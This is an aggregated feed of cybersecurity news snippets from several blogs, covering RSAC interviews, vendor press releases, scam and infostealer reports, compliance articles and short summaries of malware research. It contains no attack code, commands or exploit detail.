Many organizations, after a period of relative quiet, might believe the ransomware bubble has burst. The headlines may have shifted, and other emerging cyber threats might seem to dominate the news cycle, but recent data from Marsh's 2024 UK cyber insurance claims report suggests otherwise.
Non-human service accounts have quietly become one of the biggest liabilities in enterprise security.
Related: Why identity is the cornerstone of cyber defense
These machine credentials — used to automate connections between systems — now outnumber humans by 30 to … (more…)
The post RSAC Fireside Chat: Human and machine identity risks are converging — and they’re finally visible first appeared on The Last Watchdog.
Executives are under digital siege—and most don’t even know it.
Related: Shareholders sue over murder
At RSAC 2025, I sat down with Chuck Randolph, SVP of Strategic Intelligence and Security at 360 Privacy, to unpack a … (more…)
The post RSAC Fireside Chat: Cyber risk mitigation turns personal–defending the CEO as an attack vector first appeared on The Last Watchdog.
Reactive security isn’t just outdated — it’s become a liability. Attackers have figured out how to weaponize speed, and defenders are struggling to keep pace.
Related: Mastering adversary emulation
At RSAC 2025, I spoke with Derek Manky, Chief … (more…)
The post RSAC Fireside Chat: ‘Purple’ teams dismantle the reactive trap — and can help restore cyber readiness first appeared on The Last Watchdog.
Miami, Fla., May 22, 2025, CyberNewsWire — Halo Security, a leading provider of attack surface management and penetration testing services, today announced it has successfully achieved SOC 2 Type 1 compliance following a comprehensive audit by Insight Assurance.
This … (more…)
The post News Alert: Halo Security reaches SOC 2 milestone, validating its security controls and practices first appeared on The Last Watchdog.
Cary, NC. May 22, 2025, CyberNewswire — INE Security, a global leader in Cybersecurity training and certifications, has announced a strategic partnership with Abadnet Institute for Training, a Riyadh-based leader in specialized Information Technology, Cybersecurity, and Networking training.… (more…)
The post News alert: INE Security, Abadnet Institute partner to deliver cybersecurity training in Saudi Arabia first appeared on The Last Watchdog.
For years, network security has revolved around the perimeter: firewalls, antivirus, endpoint controls. But as attackers grow more sophisticated — and as operations scatter to the cloud, mobile, and IoT — it’s increasingly what happens inside the network that counts.… (more…)
The post SHARED INTEL Q&A: Visibility, not volume — reframing detection for the AI-enabled SOC first appeared on The Last Watchdog.
Palo Alto, Calif., May 21, 2025 – DataHub, by Acryl Data, the leading open source metadata platform, today announced it has raised $35 million in Series B funding led by Bessemer Venture Partners.
This latest round brings the company’s total … (more…)
The post News alert: DataHub secures $35M Series B to enable AI to safely manage and use data first appeared on The Last Watchdog.
Dover, Del., May 21, 2025, CyberNewswire — Attaxion, the external attack surface management (EASM) vendor with industry-leading asset coverage, announces the integration of the European Vulnerability Database (EUVD) into its platform.
Operated by the European Union Agency for Cybersecurity … (more…)
The post News alert: Attaxion integrates its EASM Platform with ENISA’s EU Vulnerability Database (EUVD) first appeared on The Last Watchdog.
A quiet but consequential shift is underway in enterprise workspace security. The browser has effectively become the new operating system of business.
Related: Gartner’s enterprise browser review
It didn’t happen all at once. But as SaaS took over, remote work … (more…)
The post RSAC Fireside Chat: Enterprise browsers arise to align security with the modern flow of work first appeared on The Last Watchdog.
Stephen Klein didn’t just stir the pot. He lit a fire.
Related: Klein’s LinkedIn debate
In a sharply worded post that quickly went viral on LinkedIn, the technologist and academic took direct aim at what he called the “hype-as-a-service” business … (more…)
The post MY TAKE: Semantics aside, “agentic AI” is already reshaping how we work, think, envision what’s next first appeared on The Last Watchdog.
Four porn sites are being investigated by the European Commission under its Digital Services Act (DSA) for allegedly failing to verify their users' ages properly.
Malwarebytes Browser Guard has a cool new feature to protect you against search hijacking.
A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site.
Cybercriminals are using text-to-video AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.
A renewed warning about toll fee scams has gone out. This time it comes from the DMVs of several US states.
A huge dataset with all kinds of sensitive information, likely to be the result of infostealers, has been found unsecured online.
A list of topics we covered in the week of May 19 to May 25 of 2025
The Lumma infostealer infrastructure has suffered a serious blow by a coordinated action of the DOJ and Microsoft.
A stalkerware company that recently leaked millions of users' personal information online has taken all of its assets offline without any explanation.
Cybercriminals are using AI-based tools to generate voice clones of the voices of senior US officials in order to scam people.
The bankrupt 23andMe, along with all of its genetic data, has been bought by US drugmaker Regeneron Pharmaceuticals.
You'd hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you'd be wrong.
This week on the Lock and Code podcast, we speak with Nick Melvoin about the Los Angeles Unified School District smartphone ban for students.
Make sure your Chrome is on the latest version, to patch against an actively exploited vulnerability that can be used to steal sensitive information from websites.
A list of topics we covered in the week of May 12 to May 18 of 2025
Read MoreThe CFPB has decided to withdraw a 2024 rule that was aimed at limiting the sale of Americans’ personal information by data brokers.
Read MoreA privacy advocacy group has clapped back at Meta over its plans to start training its AI model on European users' data.
Read MoreThe state of Texas reached a mammoth financial agreement with Google last week, securing $1.375 billion in payments to settle two lawsuits concerning the use of consumers' data.
Read MoreThe Kaleidoscope ad fraud network uses a combination of legitimate and malicious apps, according to researchers.
Read MoreA list of topics we covered in the week of May 4 to May 10 of 2025
Read MoreIn today’s regulatory landscape, organisations face increasing scrutiny over their data protection practices. With fines increasing and regulatory expectations tightening, it’s crucial to identify and address compliance vulnerabilities before they attract unwanted attention from authorities. A recent webinar by GRC Solutions, featuring experts Louise Brooks, Ryan Peeney and Zoe Hewitt, explored how organisations can use data protection gap analysis to identify weak spots in their compliance frameworks and stay ahead of regulators. This blog provides a summary of that webinar. What is a data protection gap analysis? A data protection gap analysis is a robust assessment of your organisation’s data
The post Data Protection Gap Analysis: Identifying Weak Spots Before Regulators Do appeared first on IT Governance Blog.
Read MoreThe MoJ (Ministry of Justice) has disclosed that the LAA (Legal Aid Agency) suffered a data breach last month, in which criminals accessed data relating to hundreds of thousands of people, dating back to 2010. Exfiltrated data may have included “contact details and addresses of applicants, their dates of birth, national ID numbers, criminal history, employment status and financial data such as contribution amounts, debts and payments”. According to the BBC, more than 2 million pieces of information were taken, including data relating to “domestic abuse victims, those in family cases and others facing criminal prosecution”. It’s not known whether
The post Lessons Learned from the Legal Aid Agency Data Breach appeared first on IT Governance Blog.
Read MoreDespite growing awareness and increasingly sophisticated security tools, phishing is still one of the most persistent and pernicious threats of the modern age: according to Proofpoint’s 2024 State of the Phish report, 86% of organisations experienced a phishing attempt last year and over 70% suffered a successful compromise due to human error. Phishing is also the most prevalent form of attack: the UK government’s Cyber Security Breaches Survey 2025 found that phishing accounted for 93% of all cyber crime in the UK. So why is phishing so effective? Simply because it exploits the weakest link in any cyber security setup:
The post How to Spot a Phishing Email in 2025 –with Real Examples and Red Flags appeared first on IT Governance Blog.
Read MoreThe recent DragonForce cyber attacks on the Co-Op, Marks & Spencer and Harrods show the threat of ransomware is as prevalent as ever – and, despite warnings from the attackers that they’re “putting UK retailers on the Blacklist”, it’s obviously not just the retail sector that needs to be concerned. For all organisations, it can be disastrous when systems are encrypted and data is exfiltrated. According to Sophos’s State of Ransomware report for 2024, 59% of organisations were hit by ransomware attacks last year. So what can you do to counter the risk? Ransomware as a service Ransomware is, of
The post The Co-Op, M&S, Harrods… You? Mitigating the Risk of Ransomware appeared first on IT Governance Blog.
Read MoreThe CISSP® (Certified Information Systems Security Professional) qualification is one of the most respected certifications in the information security industry, demonstrating an advanced knowledge of cyber security. It ranks alongside CCSP (Certified Cloud Security Professional) and CSSLP (Certified Secure Software Lifecycle Professional) as one of the most in-demand credentials when hiring C-level leaders in information security. Below, we explain the structure of CISSP and its domains. CISSP was launched in 1994 and its structure was last updated by (ISC)2 in 2015, moving from ten domains to eight. The domain weightings in the CISSP exam were last changed on 15 April 2024. These regular updates
The post The 8 CISSP domains explained appeared first on IT Governance Blog.
Read MoreAnd what are the challenges of migrating to a newer system, such as Windows 11? Windows 10 reaches the end of its lifecycle on 14 October 2025. But what does this mean? What are the challenges of migrating to new systems? What are the security implications? And what are the risks of delaying migration? We put these questions – and others – to our head of security testing, James Pickard. In this interview Hi James. So, what does it mean when systems or software reach the end of their lifecycle? End of life is basically when software or hardware products
The post Windows 10 End of Life: What Does it Mean for Your Organisation? appeared first on IT Governance Blog.
Read MoreCombatting Cyber Terrorism – A guide to understanding the cyber threat landscape and incident response planning Richard has led and operated various vital security projects, including the London 2012 Olympics and Russia 2014 Winter Olympics. He’s also served as executive director of London First’s security and resilience division. In addition, Richard was a senior lecturer in security and resilience at Buckinghamshire New University, and director of the BNU Business School. Currently, he’s director of the business security briefing service CSARN.org and CEO at the Global Cyber Academy. Richard is also a frequent media commentator on AI, cyber security and future
The post Author of the Month: Richard Bingley appeared first on IT Governance Blog.
Read MoreThis month, we are celebrating author Andrew Pattison! His book: NIST CSF 2.0 – Your essential introduction to managing cybersecurity risks was published in February 2025 and covers the latest updates to the NIST framework. The NIST CSF (Cybersecurity Framework) 2.0 is designed to help organisations prevent and protect themselves from cyber attacks. This book will help you understand how to: About the author: Andrew Pattison is the global head of GRC and PCI consultancy at GRC International Group, a GRC Solutions company. He has been working in information security, risk management and business continuity since the mid-1990s, helping
The post Author of the Month: Andrew Pattison appeared first on IT Governance Blog.
Read MoreThe Cyber Essentials scheme is updated each year to ensure its best-practice approach to basic cyber security remains relevant. So, what’s new for 2025? Cyber Essentials and Cyber Essentials Plus: what’s new in the 2025 update? As of 28 April 2025, new Cyber Essentials certifications will be assessed according to v3.2 of the NCSC Requirements for IT Infrastructure and must use the new ‘Willow’ Question Set, which replaces the Montpellier version. The changes introduced by the 2025 update are minor, but organisations will still need to be aware of what’s expected of them. Here’s a high-level summary. Cyber Essentials Requirements
The post The Cyber Essentials Scheme’s 2025 Update and What it Means for Your Organisation appeared first on IT Governance Blog.
Read More‘GDPR’ has become a familiar term. We recognise the visible and consumer-facing aspects of the General Data Protection Regulation in our everyday lives – when consumers exercise their right to withdraw consent to their data being processed via ‘opt out’ or ‘unsubscribe’ buttons, for example. What’s less evident is whether organisations are keeping their practices fully up to date and in line with the GDPR and other applicable data protection laws. For instance: So, how sure are you that your organisation is fully compliant with the relevant data protection legislation? In this blog ‘Once compliant’ does not mean ‘still compliant’
The post What It Takes to Be Your Organisation’s DPO or Data Privacy Lead appeared first on IT Governance Blog.
Read MoreThis report contains statistics on vulnerabilities and published exploits, along with an analysis of the most noteworthy vulnerabilities we observed in the first quarter of 2025.
Read MoreA comprehensive historical breakdown of Zanubis' changes, including RC4 and AES encryption, credentials stealing and new targets in Peru, provided by Kaspersky GReAT experts.
Read MoreKaspersky experts break down an updated cryptojacking campaign targeting containerized environments: a Dero crypto miner abuses the Docker API.
Read MoreKaspersky ICS CERT shares trends and statistics on industrial threats in Q1 2025.
Read MoreKaspersky experts discuss optimizing penetration testing with an agent for the Mythic framework and object files for Cobalt Strike.
Read MoreKaspersky researchers review ransomware trends for 2024, analyze the most active groups and forecast how this threat will evolve in 2025.
Read MoreThe Kaspersky Global Emergency Response Team (GERT) detected an Outlaw mining botnet in a customer incident. In this article, we share insights into this botnet's SSH-based infection chain.
Read MoreKaspersky expert has discovered a new version of the Triada Trojan, with custom modules for Telegram, WhatsApp, TikTok, and other apps.
Read MoreKaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.
Read MoreWhile investigating an incident, we discovered a sophisticated new backdoor targeting Russian organizations by impersonating secure networking software updates.